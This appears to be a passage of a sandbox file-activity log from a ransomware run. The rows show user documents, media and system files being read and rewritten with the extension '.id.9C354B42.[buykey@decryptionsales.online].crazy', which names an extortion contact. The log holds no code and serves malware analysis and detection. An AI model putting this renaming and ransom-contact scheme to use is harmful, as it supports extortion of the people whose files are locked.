| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\dIWmCM25b.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Ga524uPFE.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Ga524uPFE.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GCRJax9oSl-PDOf8RN5g.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GCRJax9oSl-PDOf8RN5g.docx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gCyP3tS6Nfo.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gCyP3tS6Nfo.pptx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\IbV9ZSKuOaHjOV8tw-.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\IbV9ZSKuOaHjOV8tw-.pptx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\JtR42buA0npxjlS8.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\JtR42buA0npxjlS8.pptx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\klEXSIx373WD-W.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\klEXSIx373WD-W.pptx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ll WX9Ni0AoPnlZ.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ll WX9Ni0AoPnlZ.docx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Poggdli 6ZwXP_LCoY2.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Poggdli 6ZwXP_LCoY2.pptx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\R9B-bZCMv.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\R9B-bZCMv.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\sFaFW.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\sFaFW.docx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\sgm1tuUWQg8_qagvxT.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\sgm1tuUWQg8_qagvxT.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\sT5c 1R_iiNp21cz.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\sT5c 1R_iiNp21cz.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\vSIRx7.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\vSIRx7.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\-FfGLM.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\-FfGLM.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\GB8gg.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\GB8gg.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\IoTrl5QTOTSX6.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\IoTrl5QTOTSX6.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\MCEh.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\MCEh.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\Yxml9PR3NU8TocP.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Music\Yxml9PR3NU8TocP.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\Mxi-7G.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\Mxi-7G.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\obP1MZxOYTOU0M.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\obP1MZxOYTOU0M.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\V4ta_7q8E.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\V4ta_7q8E.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\WGJr8HsQ3cNr.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\WGJr8HsQ3cNr.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 01.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 01.wma.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 02.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 02.wma.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 03.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 03.wma.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 04.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 04.wma.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 05.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 05.wma.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 06.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 06.wma.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 07.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 07.wma.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 08.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 08.wma.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 09.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 09.wma.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 10.wma | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 10.wma.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\3c36hvJ.ppt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\3c36hvJ.ppt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\7-bAh6U4rAT2NxlpPmP.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\7-bAh6U4rAT2NxlpPmP.docx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\9jvfHx1YKCp2q7KNlSN.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\9jvfHx1YKCp2q7KNlSN.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\BByB g-FFJZoyl.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\BByB g-FFJZoyl.pptx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\c_nBWhjBhrbRS.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\c_nBWhjBhrbRS.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\D1ijz4tBJN.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\D1ijz4tBJN.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\EEXi78eo.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\EEXi78eo.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\KL8pWDj.mp3 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\KL8pWDj.mp3.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Kt7kO4H4keZni.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Kt7kO4H4keZni.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\nKGYbVZpTIswb.mp4 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\nKGYbVZpTIswb.mp4.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\p7Wq.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\p7Wq.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\PQJOEhuk97AXdv-8NZwU.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\PQJOEhuk97AXdv-8NZwU.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\PV OK2gwkkxCl_X9ZLw3.wav | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\PV OK2gwkkxCl_X9ZLw3.wav.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\qW4c.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\qW4c.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\VNZ00iTwww5po.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\VNZ00iTwww5po.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\W5qrVBMnvb.jpg | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\W5qrVBMnvb.jpg.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\xbU_FPHv2pR.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\xbU_FPHv2pR.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\yc4ufV 2VyVQ.ppt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\yc4ufV 2VyVQ.ppt.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\zpLc5E94z6TlNyAM6.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\zpLc5E94z6TlNyAM6.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pYBMagiZk\qZ17nMU.avi | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pYBMagiZk\qZ17nMU.avi.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pYBMagiZk\wbCMzXd-sn5Mcgadtuk.png | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pYBMagiZk\wbCMzXd-sn5Mcgadtuk.png.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\9tRJy\ERhBa.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\9tRJy\ERhBa.xlsx.id.9C354B42.[buykey@decryptionsales.online].crazy | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\9tRJy\iBfu.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
